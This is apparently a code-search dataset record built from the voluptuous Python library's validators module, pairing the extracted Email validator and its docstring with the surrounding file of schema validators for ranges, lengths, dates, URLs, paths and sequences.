self.msg or 'value must be at least %s' % self.min)
else:
if self.min is not None and not v > self.min:
raise RangeInvalid(
self.msg or 'value must be higher than %s' % self.min)
if self.max_included:
if self.max is not None and not v <= self.max:
raise RangeInvalid(
self.msg or 'value must be at most %s' % self.max)
else:
if self.max is not None and not v < self.max:
raise RangeInvalid(
self.msg or 'value must be lower than %s' % self.max)
return v
def __repr__(self):
return ('Range(min=%r, max=%r, min_included=%r,'
' max_included=%r, msg=%r)' % (self.min, self.max,
self.min_included,
self.max_included,
self.msg))
class Clamp(object):
"""Clamp a value to a range.
Either min or max may be omitted.
>>> s = Schema(Clamp(min=0, max=1))
>>> s(0.5)
0.5
>>> s(5)
1
>>> s(-1)
0
"""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and v < self.min:
v = self.min
if self.max is not None and v > self.max:
v = self.max
return v
def __repr__(self):
return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
"""The length of a value must be in a certain range."""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and len(v) < self.min:
raise LengthInvalid(
self.msg or 'length of value must be at least %s' % self.min)
if self.max is not None and len(v) > self.max:
raise LengthInvalid(
self.msg or 'length of value must be at most %s' % self.max)
return v
def __repr__(self):
return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
"""Validate that the value matches the datetime format."""
DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
def __init__(self, format=None, msg=None):
self.format = format or self.DEFAULT_FORMAT
self.msg = msg
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DatetimeInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Datetime(format=%s)' % self.format
class Date(Datetime):
"""Validate that the value matches the date format."""
DEFAULT_FORMAT = '%Y-%m-%d'
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DateInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Date(format=%s)' % self.format
class In(object):
"""Validate that a value is in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v not in self.container
except TypeError:
check = True
if check:
raise InInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'In(%s)' % (self.container,)
class NotIn(object):
"""Validate that a value is not in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v in self.container
except TypeError:
check = True
if check:
raise NotInInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'NotIn(%s)' % (self.container,)
class Contains(object):
"""Validate that the given schema element is in the sequence being validated.
>>> s = Contains(1)
>>> s([3, 2, 1])
[3, 2, 1]
>>> with raises(ContainsInvalid, 'value is not allowed'):
... s([3, 2])
"""
def __init__(self, item, msg=None):
self.item = item
self.msg = msg
def __call__(self, v):
try:
check = self.item not in v
except TypeError:
check = True
if check:
raise ContainsInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
"""Matches each element in a sequence against the corresponding element in
the validators.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema
constructors.
>>> from voluptuous import Schema, ExactSequence
>>> validate = Schema(ExactSequence([str, int, list, list]))
>>> validate(['hourly_report', 10, [], []])
['hourly_report', 10, [], []]
>>> validate(('hourly_report', 10, [], []))
('hourly_report', 10, [], [])
"""
def __init__(self, validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
raise ExactSequenceInvalid(self.msg)
try:
v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
except Invalid as e:
raise e if self.msg is None else ExactSequenceInvalid(self.msg)
return v
def __repr__(self):
return 'ExactSequence([%s])' % (", ".join(repr(v)
for v in self.validators))
class Unique(object):
"""Ensure an iterable does not contain duplicate items.
Only iterables convertable to a set are supported (native types and
objects with correct __eq__).
JSON does not support set, so they need to be presented as arrays.
Unique allows ensuring that such array does not contain dupes.
>>> s = Schema(Unique())
>>> s([])
[]
>>> s([1, 2])
[1, 2]
>>> with raises(Invalid, 'contains duplicate items: [1]'):
... s([1, 1, 2])
>>> with raises(Invalid, "contains duplicate items: ['one']"):
... s(['one', 'two', 'one'])
>>> with raises(Invalid, regex="^contains unhashable elements: "):
... s([set([1, 2]), set([3, 4])])
>>> s('abc')
'abc'
>>> with raises(Invalid, regex="^contains duplicate items: "):
... s('aabbc')
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except TypeError as e:
raise TypeInvalid(
self.msg or 'contains unhashable elements: {0}'.format(e))
if len(set_v) != len(v):
seen = set()
dupes = list(set(x for x in v if x in seen or seen.add(x)))
raise Invalid(
self.msg or 'contains duplicate items: {0}'.format(dupes))
return v
def __repr__(self):
return 'Unique()'
class Equal(object):
"""Ensure that value matches target.
>>> s = Schema(Equal(1))
>>> s(1)
1
>>> with raises(Invalid):
... s(2)
Validators are not supported, match must be exact:
>>> s = Schema(Equal(str))
>>> with raises(Invalid):
... s('foo')
"""
def __init__(self, target, msg=None):
self.target = target
self.msg = msg
def __call__(self, v):
if v != self.target:
raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
return v
def __repr__(self):
return 'Equal({})'.format(self.target)
class Unordered(object):
"""Ensures sequence contains values in unspecified order.
>>> s = Schema(Unordered([2, 1]))
>>> s([2, 1])
[2, 1]
>>> s([1, 2])
[1, 2]
>>> s = Schema(Unordered([str, int]))
>>> s(['foo', 1])
['foo', 1]
>>> s([1, 'foo'])
[1, 'foo']
"""
def __init__(self, validators, msg=None, **kwargs):
self.validators = validators
self.msg = msg
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)):
raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
if len(v) != len(self._schemas):
raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
consumed = set()
missing = []
for index, value in enumerate(v):
found = False
for i, s in enumerate(self._schemas):
if i in consumed:
continue
try:
s(value)
except Invalid:
pass
else:
found = True
consumed.add(i)
break
if not found:
missing.append((index, value))
if len(missing) == 1:
el = missing[0]
raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
elif missing:
raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
el[0], el[1])) for el in missing])
return v
def __repr__(self):
return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
def _get_precision_scale(self, number):
"""
:param number:
:return: tuple(precision, scale, decimal_number)
"""
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
"""Value must pass at least some validations, determined by the given parameter.
Optionally, number of passed validations can be capped.
The output of each validator is passed as input to the next.
:param min_valid: Minimum number of valid schemas.
:param validators: a list of schemas or validators to match input against
:param max_valid: Maximum number of valid schemas.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:raises NotEnoughValid: if the minimum number of validations isn't met
:raises TooManyValid: if the more validations than the given amount is met
>>> validate = Schema(SomeOf(min_valid=2, validators=[Range(1, 5), Any(float, int), 6.6]))
>>> validate(6.6)
6.6
>>> validate(3)
3
>>> with raises(MultipleInvalid, 'value must be at most 5, not a valid value'):
... validate(6.2)
"""
def __init__(self, validators, min_valid=None, max_valid=None, **kwargs):
assert min_valid is not None or max_valid is not None, \
'when using "%s" you should specify at least one of min_valid and max_valid' % (type(self).__name__,)
self.min_valid = min_valid or 0
self.max_valid = max_valid or len(validators)
super(SomeOf, self).__init__(*validators, **kwargs)
def _exec(self, funcs, v, path=None):
errors = []
funcs = list(funcs)
for func in funcs:
try:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
errors.append(e)
passed_count = len(funcs) - len(errors)
if self.min_valid <= passed_count <= self.max_valid:
return v
msg = self.msg
if not msg:
msg = ', '.join(map(str, errors))
if passed_count > self.max_valid:
raise TooManyValid(msg)
raise NotEnoughValid(msg)
def __repr__(self):
return 'SomeOf(min_valid=%s, validators=[%s], max_valid=%s, msg=%r)' % (
self.min_valid, ", ".join(repr(v) for v in self.validators), self.max_valid, self.msg)
|
alecthomas/voluptuous | voluptuous/validators.py | Email | python | def Email(v):
try:
if not v or "@" not in v:
raise EmailInvalid("Invalid Email")
user_part, domain_part = v.rsplit('@', 1)
if not (USER_REGEX.match(user_part) and DOMAIN_REGEX.match(domain_part)):
raise EmailInvalid("Invalid Email")
return v
except:
raise ValueError | Verify that the value is an Email or not.
>>> s = Schema(Email())
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> with raises(MultipleInvalid, 'expected an Email'):
... s("a@.com")
>>> s('t@x.com')
't@x.com' | train | https://github.com/alecthomas/voluptuous/blob/36c8c11e2b7eb402c24866fa558473661ede9403/voluptuous/validators.py#L366-L388 | null | import os
import re
import datetime
import sys
from functools import wraps
from decimal import Decimal, InvalidOperation
from voluptuous.schema_builder import Schema, raises, message
from voluptuous.error import (MultipleInvalid, CoerceInvalid, TrueInvalid, FalseInvalid, BooleanInvalid, Invalid,
AnyInvalid, AllInvalid, MatchInvalid, UrlInvalid, EmailInvalid, FileInvalid, DirInvalid,
RangeInvalid, PathInvalid, ExactSequenceInvalid, LengthInvalid, DatetimeInvalid,
DateInvalid, InInvalid, TypeInvalid, NotInInvalid, ContainsInvalid, NotEnoughValid,
TooManyValid)
if sys.version_info >= (3,):
import urllib.parse as urlparse
basestring = str
else:
import urlparse
# Taken from https://github.com/kvesteri/validators/blob/master/validators/email.py
USER_REGEX = re.compile(
# dot-atom
r"(^[-!#$%&'*+/=?^_`{}|~0-9A-Z]+"
r"(\.[-!#$%&'*+/=?^_`{}|~0-9A-Z]+)*$"
# quoted-string
r'|^"([\001-\010\013\014\016-\037!#-\[\]-\177]|'
r"""\\[\001-\011\013\014\016-\177])*"$)""",
re.IGNORECASE
)
DOMAIN_REGEX = re.compile(
# domain
r'(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?$)'
# literal form, ipv4 address (SMTP 4.1.3)
r'|^\[(25[0-5]|2[0-4]\d|[0-1]?\d?\d)'
r'(\.(25[0-5]|2[0-4]\d|[0-1]?\d?\d)){3}\]$',
re.IGNORECASE)
__author__ = 'tusharmakkar08'
def truth(f):
"""Convenience decorator to convert truth functions into validators.
>>> @truth
... def isdir(v):
... return os.path.isdir(v)
>>> validate = Schema(isdir)
>>> validate('/')
'/'
>>> with raises(MultipleInvalid, 'not a valid value'):
... validate('/notavaliddir')
"""
@wraps(f)
def check(v):
t = f(v)
if not t:
raise ValueError
return v
return check
class Coerce(object):
"""Coerce a value to a type.
If the type constructor throws a ValueError or TypeError, the value
will be marked as Invalid.
Default behavior:
>>> validate = Schema(Coerce(int))
>>> with raises(MultipleInvalid, 'expected int'):
... validate(None)
>>> with raises(MultipleInvalid, 'expected int'):
... validate('foo')
With custom message:
>>> validate = Schema(Coerce(int, "moo"))
>>> with raises(MultipleInvalid, 'moo'):
... validate('foo')
"""
def __init__(self, type, msg=None):
self.type = type
self.msg = msg
self.type_name = type.__name__
def __call__(self, v):
try:
return self.type(v)
except (ValueError, TypeError, InvalidOperation):
msg = self.msg or ('expected %s' % self.type_name)
raise CoerceInvalid(msg)
def __repr__(self):
return 'Coerce(%s, msg=%r)' % (self.type_name, self.msg)
@message('value was not true', cls=TrueInvalid)
@truth
def IsTrue(v):
"""Assert that a value is true, in the Python sense.
>>> validate = Schema(IsTrue())
"In the Python sense" means that implicitly false values, such as empty
lists, dictionaries, etc. are treated as "false":
>>> with raises(MultipleInvalid, "value was not true"):
... validate([])
>>> validate([1])
[1]
>>> with raises(MultipleInvalid, "value was not true"):
... validate(False)
...and so on.
>>> try:
... validate([])
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], TrueInvalid)
"""
return v
@message('value was not false', cls=FalseInvalid)
def IsFalse(v):
"""Assert that a value is false, in the Python sense.
(see :func:`IsTrue` for more detail)
>>> validate = Schema(IsFalse())
>>> validate([])
[]
>>> with raises(MultipleInvalid, "value was not false"):
... validate(True)
>>> try:
... validate(True)
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], FalseInvalid)
"""
if v:
raise ValueError
return v
@message('expected boolean', cls=BooleanInvalid)
def Boolean(v):
"""Convert human-readable boolean values to a bool.
Accepted values are 1, true, yes, on, enable, and their negatives.
Non-string values are cast to bool.
>>> validate = Schema(Boolean())
>>> validate(True)
True
>>> validate("1")
True
>>> validate("0")
False
>>> with raises(MultipleInvalid, "expected boolean"):
... validate('moo')
>>> try:
... validate('moo')
... except MultipleInvalid as e:
... assert isinstance(e.errors[0], BooleanInvalid)
"""
if isinstance(v, basestring):
v = v.lower()
if v in ('1', 'true', 'yes', 'on', 'enable'):
return True
if v in ('0', 'false', 'no', 'off', 'disable'):
return False
raise ValueError
return bool(v)
class _WithSubValidators(object):
"""Base class for validators that use sub-validators.
Special class to use as a parent class for validators using sub-validators.
This class provides the `__voluptuous_compile__` method so the
sub-validators are compiled by the parent `Schema`.
"""
def __init__(self, *validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self.required = kwargs.pop('required', False)
def __voluptuous_compile__(self, schema):
self._compiled = []
for v in self.validators:
schema.required = self.required
self._compiled.append(schema._compile(v))
return self._run
def _run(self, path, value):
return self._exec(self._compiled, value, path)
def __call__(self, v):
return self._exec((Schema(val) for val in self.validators), v)
def __repr__(self):
return '%s(%s, msg=%r)' % (
self.__class__.__name__,
", ".join(repr(v) for v in self.validators),
self.msg
)
class Any(_WithSubValidators):
"""Use the first validated value.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
:returns: Return value of the first validator that passes.
>>> validate = Schema(Any('true', 'false',
... All(Any(int, bool), Coerce(bool))))
>>> validate('true')
'true'
>>> validate(1)
True
>>> with raises(MultipleInvalid, "not a valid value"):
... validate('moo')
msg argument is used
>>> validate = Schema(Any(1, 2, 3, msg="Expected 1 2 or 3"))
>>> validate(1)
1
>>> with raises(MultipleInvalid, "Expected 1 2 or 3"):
... validate(4)
"""
def _exec(self, funcs, v, path=None):
error = None
for func in funcs:
try:
if path is None:
return func(v)
else:
return func(path, v)
except Invalid as e:
if error is None or len(e.path) > len(error.path):
error = e
else:
if error:
raise error if self.msg is None else AnyInvalid(
self.msg, path=path)
raise AnyInvalid(self.msg or 'no valid value found',
path=path)
# Convenience alias
Or = Any
class All(_WithSubValidators):
"""Value must pass all validators.
The output of each validator is passed as input to the next.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema constructors.
>>> validate = Schema(All('10', Coerce(int)))
>>> validate('10')
10
"""
def _exec(self, funcs, v, path=None):
try:
for func in funcs:
if path is None:
v = func(v)
else:
v = func(path, v)
except Invalid as e:
raise e if self.msg is None else AllInvalid(self.msg, path=path)
return v
# Convenience alias
And = All
class Match(object):
"""Value must be a string that matches the regular expression.
>>> validate = Schema(Match(r'^0x[A-F0-9]+$'))
>>> validate('0x123EF4')
'0x123EF4'
>>> with raises(MultipleInvalid, "does not match regular expression"):
... validate('123EF4')
>>> with raises(MultipleInvalid, 'expected string or buffer'):
... validate(123)
Pattern may also be a _compiled regular expression:
>>> validate = Schema(Match(re.compile(r'0x[A-F0-9]+', re.I)))
>>> validate('0x123ef4')
'0x123ef4'
"""
def __init__(self, pattern, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.msg = msg
def __call__(self, v):
try:
match = self.pattern.match(v)
except TypeError:
raise MatchInvalid("expected string or buffer")
if not match:
raise MatchInvalid(self.msg or 'does not match regular expression')
return v
def __repr__(self):
return 'Match(%r, msg=%r)' % (self.pattern.pattern, self.msg)
class Replace(object):
"""Regex substitution.
>>> validate = Schema(All(Replace('you', 'I'),
... Replace('hello', 'goodbye')))
>>> validate('you say hello')
'I say goodbye'
"""
def __init__(self, pattern, substitution, msg=None):
if isinstance(pattern, basestring):
pattern = re.compile(pattern)
self.pattern = pattern
self.substitution = substitution
self.msg = msg
def __call__(self, v):
return self.pattern.sub(self.substitution, v)
def __repr__(self):
return 'Replace(%r, %r, msg=%r)' % (self.pattern.pattern,
self.substitution,
self.msg)
def _url_validation(v):
parsed = urlparse.urlparse(v)
if not parsed.scheme or not parsed.netloc:
raise UrlInvalid("must have a URL scheme and host")
return parsed
@message('expected an Email', cls=EmailInvalid)
@message('expected a Fully qualified domain name URL', cls=UrlInvalid)
def FqdnUrl(v):
"""Verify that the value is a Fully qualified domain name URL.
>>> s = Schema(FqdnUrl())
>>> with raises(MultipleInvalid, 'expected a Fully qualified domain name URL'):
... s("http://localhost/")
>>> s('http://w3.org')
'http://w3.org'
"""
try:
parsed_url = _url_validation(v)
if "." not in parsed_url.netloc:
raise UrlInvalid("must have a domain name in URL")
return v
except:
raise ValueError
@message('expected a URL', cls=UrlInvalid)
def Url(v):
"""Verify that the value is a URL.
>>> s = Schema(Url())
>>> with raises(MultipleInvalid, 'expected a URL'):
... s(1)
>>> s('http://w3.org')
'http://w3.org'
"""
try:
_url_validation(v)
return v
except:
raise ValueError
@message('not a file', cls=FileInvalid)
@truth
def IsFile(v):
"""Verify the file exists.
>>> os.path.basename(IsFile()(__file__)).startswith('validators.py')
True
>>> with raises(FileInvalid, 'not a file'):
... IsFile()("random_filename_goes_here.py")
>>> with raises(FileInvalid, 'Not a file'):
... IsFile()(None)
"""
try:
if v:
v = str(v)
return os.path.isfile(v)
else:
raise FileInvalid('Not a file')
except TypeError:
raise FileInvalid('Not a file')
@message('not a directory', cls=DirInvalid)
@truth
def IsDir(v):
"""Verify the directory exists.
>>> IsDir()('/')
'/'
>>> with raises(DirInvalid, 'Not a directory'):
... IsDir()(None)
"""
try:
if v:
v = str(v)
return os.path.isdir(v)
else:
raise DirInvalid("Not a directory")
except TypeError:
raise DirInvalid("Not a directory")
@message('path does not exist', cls=PathInvalid)
@truth
def PathExists(v):
"""Verify the path exists, regardless of its type.
>>> os.path.basename(PathExists()(__file__)).startswith('validators.py')
True
>>> with raises(Invalid, 'path does not exist'):
... PathExists()("random_filename_goes_here.py")
>>> with raises(PathInvalid, 'Not a Path'):
... PathExists()(None)
"""
try:
if v:
v = str(v)
return os.path.exists(v)
else:
raise PathInvalid("Not a Path")
except TypeError:
raise PathInvalid("Not a Path")
def Maybe(validator, msg=None):
"""Validate that the object matches given validator or is None.
:raises Invalid: if the value does not match the given validator and is not
None
>>> s = Schema(Maybe(int))
>>> s(10)
10
>>> with raises(Invalid):
... s("string")
"""
return Any(None, validator, msg=msg)
class Range(object):
"""Limit a value to a range.
Either min or max may be omitted.
Either min or max can be excluded from the range of accepted values.
:raises Invalid: If the value is outside the range.
>>> s = Schema(Range(min=1, max=10, min_included=False))
>>> s(5)
5
>>> s(10)
10
>>> with raises(MultipleInvalid, 'value must be at most 10'):
... s(20)
>>> with raises(MultipleInvalid, 'value must be higher than 1'):
... s(1)
>>> with raises(MultipleInvalid, 'value must be lower than 10'):
... Schema(Range(max=10, max_included=False))(20)
"""
def __init__(self, min=None, max=None, min_included=True,
max_included=True, msg=None):
self.min = min
self.max = max
self.min_included = min_included
self.max_included = max_included
self.msg = msg
def __call__(self, v):
if self.min_included:
if self.min is not None and not v >= self.min:
raise RangeInvalid(
self.msg or 'value must be at least %s' % self.min)
else:
if self.min is not None and not v > self.min:
raise RangeInvalid(
self.msg or 'value must be higher than %s' % self.min)
if self.max_included:
if self.max is not None and not v <= self.max:
raise RangeInvalid(
self.msg or 'value must be at most %s' % self.max)
else:
if self.max is not None and not v < self.max:
raise RangeInvalid(
self.msg or 'value must be lower than %s' % self.max)
return v
def __repr__(self):
return ('Range(min=%r, max=%r, min_included=%r,'
' max_included=%r, msg=%r)' % (self.min, self.max,
self.min_included,
self.max_included,
self.msg))
class Clamp(object):
"""Clamp a value to a range.
Either min or max may be omitted.
>>> s = Schema(Clamp(min=0, max=1))
>>> s(0.5)
0.5
>>> s(5)
1
>>> s(-1)
0
"""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and v < self.min:
v = self.min
if self.max is not None and v > self.max:
v = self.max
return v
def __repr__(self):
return 'Clamp(min=%s, max=%s)' % (self.min, self.max)
class Length(object):
"""The length of a value must be in a certain range."""
def __init__(self, min=None, max=None, msg=None):
self.min = min
self.max = max
self.msg = msg
def __call__(self, v):
if self.min is not None and len(v) < self.min:
raise LengthInvalid(
self.msg or 'length of value must be at least %s' % self.min)
if self.max is not None and len(v) > self.max:
raise LengthInvalid(
self.msg or 'length of value must be at most %s' % self.max)
return v
def __repr__(self):
return 'Length(min=%s, max=%s)' % (self.min, self.max)
class Datetime(object):
"""Validate that the value matches the datetime format."""
DEFAULT_FORMAT = '%Y-%m-%dT%H:%M:%S.%fZ'
def __init__(self, format=None, msg=None):
self.format = format or self.DEFAULT_FORMAT
self.msg = msg
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DatetimeInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Datetime(format=%s)' % self.format
class Date(Datetime):
"""Validate that the value matches the date format."""
DEFAULT_FORMAT = '%Y-%m-%d'
def __call__(self, v):
try:
datetime.datetime.strptime(v, self.format)
except (TypeError, ValueError):
raise DateInvalid(
self.msg or 'value does not match'
' expected format %s' % self.format)
return v
def __repr__(self):
return 'Date(format=%s)' % self.format
class In(object):
"""Validate that a value is in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v not in self.container
except TypeError:
check = True
if check:
raise InInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'In(%s)' % (self.container,)
class NotIn(object):
"""Validate that a value is not in a collection."""
def __init__(self, container, msg=None):
self.container = container
self.msg = msg
def __call__(self, v):
try:
check = v in self.container
except TypeError:
check = True
if check:
raise NotInInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'NotIn(%s)' % (self.container,)
class Contains(object):
"""Validate that the given schema element is in the sequence being validated.
>>> s = Contains(1)
>>> s([3, 2, 1])
[3, 2, 1]
>>> with raises(ContainsInvalid, 'value is not allowed'):
... s([3, 2])
"""
def __init__(self, item, msg=None):
self.item = item
self.msg = msg
def __call__(self, v):
try:
check = self.item not in v
except TypeError:
check = True
if check:
raise ContainsInvalid(self.msg or 'value is not allowed')
return v
def __repr__(self):
return 'Contains(%s)' % (self.item,)
class ExactSequence(object):
"""Matches each element in a sequence against the corresponding element in
the validators.
:param msg: Message to deliver to user if validation fails.
:param kwargs: All other keyword arguments are passed to the sub-Schema
constructors.
>>> from voluptuous import Schema, ExactSequence
>>> validate = Schema(ExactSequence([str, int, list, list]))
>>> validate(['hourly_report', 10, [], []])
['hourly_report', 10, [], []]
>>> validate(('hourly_report', 10, [], []))
('hourly_report', 10, [], [])
"""
def __init__(self, validators, **kwargs):
self.validators = validators
self.msg = kwargs.pop('msg', None)
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)) or len(v) != len(self._schemas):
raise ExactSequenceInvalid(self.msg)
try:
v = type(v)(schema(x) for x, schema in zip(v, self._schemas))
except Invalid as e:
raise e if self.msg is None else ExactSequenceInvalid(self.msg)
return v
def __repr__(self):
return 'ExactSequence([%s])' % (", ".join(repr(v)
for v in self.validators))
class Unique(object):
"""Ensure an iterable does not contain duplicate items.
Only iterables convertable to a set are supported (native types and
objects with correct __eq__).
JSON does not support set, so they need to be presented as arrays.
Unique allows ensuring that such array does not contain dupes.
>>> s = Schema(Unique())
>>> s([])
[]
>>> s([1, 2])
[1, 2]
>>> with raises(Invalid, 'contains duplicate items: [1]'):
... s([1, 1, 2])
>>> with raises(Invalid, "contains duplicate items: ['one']"):
... s(['one', 'two', 'one'])
>>> with raises(Invalid, regex="^contains unhashable elements: "):
... s([set([1, 2]), set([3, 4])])
>>> s('abc')
'abc'
>>> with raises(Invalid, regex="^contains duplicate items: "):
... s('aabbc')
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except TypeError as e:
raise TypeInvalid(
self.msg or 'contains unhashable elements: {0}'.format(e))
if len(set_v) != len(v):
seen = set()
dupes = list(set(x for x in v if x in seen or seen.add(x)))
raise Invalid(
self.msg or 'contains duplicate items: {0}'.format(dupes))
return v
def __repr__(self):
return 'Unique()'
class Equal(object):
"""Ensure that value matches target.
>>> s = Schema(Equal(1))
>>> s(1)
1
>>> with raises(Invalid):
... s(2)
Validators are not supported, match must be exact:
>>> s = Schema(Equal(str))
>>> with raises(Invalid):
... s('foo')
"""
def __init__(self, target, msg=None):
self.target = target
self.msg = msg
def __call__(self, v):
if v != self.target:
raise Invalid(self.msg or 'Values are not equal: value:{} != target:{}'.format(v, self.target))
return v
def __repr__(self):
return 'Equal({})'.format(self.target)
class Unordered(object):
"""Ensures sequence contains values in unspecified order.
>>> s = Schema(Unordered([2, 1]))
>>> s([2, 1])
[2, 1]
>>> s([1, 2])
[1, 2]
>>> s = Schema(Unordered([str, int]))
>>> s(['foo', 1])
['foo', 1]
>>> s([1, 'foo'])
[1, 'foo']
"""
def __init__(self, validators, msg=None, **kwargs):
self.validators = validators
self.msg = msg
self._schemas = [Schema(val, **kwargs) for val in validators]
def __call__(self, v):
if not isinstance(v, (list, tuple)):
raise Invalid(self.msg or 'Value {} is not sequence!'.format(v))
if len(v) != len(self._schemas):
raise Invalid(self.msg or 'List lengths differ, value:{} != target:{}'.format(len(v), len(self._schemas)))
consumed = set()
missing = []
for index, value in enumerate(v):
found = False
for i, s in enumerate(self._schemas):
if i in consumed:
continue
try:
s(value)
except Invalid:
pass
else:
found = True
consumed.add(i)
break
if not found:
missing.append((index, value))
if len(missing) == 1:
el = missing[0]
raise Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(el[0], el[1]))
elif missing:
raise MultipleInvalid([Invalid(self.msg or 'Element #{} ({}) is not valid against any validator'.format(
el[0], el[1])) for el in missing])
return v
def __repr__(self):
return 'Unordered([{}])'.format(", ".join(repr(v) for v in self.validators))
class Number(object):
"""
Verify the number of digits that are present in the number(Precision),
and the decimal places(Scale)
:raises Invalid: If the value does not match the provided Precision and Scale.
>>> schema = Schema(Number(precision=6, scale=2))
>>> schema('1234.01')
'1234.01'
>>> schema = Schema(Number(precision=6, scale=2, yield_decimal=True))
>>> schema('1234.01')
Decimal('1234.01')
"""
def __init__(self, precision=None, scale=None, msg=None, yield_decimal=False):
self.precision = precision
self.scale = scale
self.msg = msg
self.yield_decimal = yield_decimal
def __call__(self, v):
"""
:param v: is a number enclosed with string
:return: Decimal number
"""
precision, scale, decimal_num = self._get_precision_scale(v)
if self.precision is not None and self.scale is not None and precision != self.precision\
and scale != self.scale:
raise Invalid(self.msg or "Precision must be equal to %s, and Scale must be equal to %s" % (self.precision,
self.scale))
else:
if self.precision is not None and precision != self.precision:
raise Invalid(self.msg or "Precision must be equal to %s" % self.precision)
if self.scale is not None and scale != self.scale:
raise Invalid(self.msg or "Scale must be equal to %s" % self.scale)
if self.yield_decimal:
return decimal_num
else:
return v
def __repr__(self):
return ('Number(precision=%s, scale=%s, msg=%s)' % (self.precision, self.scale, self.msg))
def _get_precision_scale(self, number):
"""
:param number:
:return: tuple(precision, scale, decimal_number)
"""
try:
decimal_num = Decimal(number)
except InvalidOperation:
raise Invalid(self.msg or 'Value must be a number enclosed with string')
return (len(decimal_num.as_tuple().digits), -(decimal_num.as_tuple().exponent), decimal_num)
class SomeOf(_WithSubValidators):
"""Value must pass at least some validations, determined by the given parameter.
Optionally, number of passed validations can be capped.
The output of each validator is passed as input to the next.
:param min_valid: Minimum number of valid schemas.
:param validators: a list of schemas or validators to match input against
:param max_valid: Maximum number of valid schemas.
